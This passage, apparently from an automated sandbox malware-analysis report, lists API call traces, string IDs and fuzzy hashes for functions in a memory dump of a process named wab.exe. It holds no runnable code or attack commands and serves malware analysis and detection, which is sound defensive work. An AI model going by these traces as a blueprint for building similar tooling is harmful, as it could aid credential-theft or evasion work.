                                                                                    • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                                                  • String ID:
                                                                                  • API String ID: 1161345128-0
                                                                                  • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                  • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                  • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                  • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcsicmp
                                                                                  • String ID: /stext
                                                                                  • API String ID: 2081463915-3817206916
                                                                                  • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                  • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                  • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                  • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                  • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                                                                  • String ID:
                                                                                  • API String ID: 159017214-0
                                                                                  • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                  • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                  • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                  • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                  • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                  • String ID:
                                                                                  • API String ID: 3150196962-0
                                                                                  • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                  • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                  • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                  • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: malloc
                                                                                  • String ID: failed to allocate %u bytes of memory
                                                                                  • API String ID: 2803490479-1168259600
                                                                                  • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                  • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                  • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                  • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??3@
                                                                                  • String ID:
                                                                                  • API String ID: 613200358-0
                                                                                  • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                  • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                  • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                  • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcmpmemset
                                                                                  • String ID:
                                                                                  • API String ID: 1065087418-0
                                                                                  • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                  • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                  • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                  • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                    • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                    • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                    • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                  • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                                                                  • String ID:
                                                                                  • API String ID: 1481295809-0
                                                                                  • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                  • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                  • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                  • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                  • String ID:
                                                                                  • API String ID: 3150196962-0
                                                                                  • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                  • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                  • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                  • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$PointerRead
                                                                                  • String ID:
                                                                                  • API String ID: 3154509469-0
                                                                                  • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                  • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                  • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                  • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                    • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                    • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                    • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                  • String ID:
                                                                                  • API String ID: 4232544981-0
                                                                                  • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                  • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                  • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                  • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeLibrary
                                                                                  • String ID:
                                                                                  • API String ID: 3664257935-0
                                                                                  • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                  • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                  • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                  • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                  • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$FileModuleName
                                                                                  • String ID:
                                                                                  • API String ID: 3859505661-0
                                                                                  • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                  • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                  • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                  • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileRead
                                                                                  • String ID:
                                                                                  • API String ID: 2738559852-0
                                                                                  • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                  • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                  • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                  • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3934441357-0
                                                                                  • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                  • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                  • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                  • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeLibrary
                                                                                  • String ID:
                                                                                  • API String ID: 3664257935-0
                                                                                  • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                  • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                  • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                  • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??3@
                                                                                  • String ID:
                                                                                  • API String ID: 613200358-0
                                                                                  • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                  • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                  • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                  • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                  • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                  • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                  • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                  • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                  • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                  • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??3@
                                                                                  • String ID:
                                                                                  • API String ID: 613200358-0
                                                                                  • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                  • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                  • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                  • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??3@
                                                                                  • String ID:
                                                                                  • API String ID: 613200358-0
                                                                                  • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                  • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                  • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                  • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeLibrary
                                                                                  • String ID:
                                                                                  • API String ID: 3664257935-0
                                                                                  • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                  • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                  • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                  • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnumNamesResource
                                                                                  • String ID:
                                                                                  • API String ID: 3334572018-0
                                                                                  • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                  • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                  • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                  • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeLibrary
                                                                                  • String ID:
                                                                                  • API String ID: 3664257935-0
                                                                                  • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                  • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                  • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
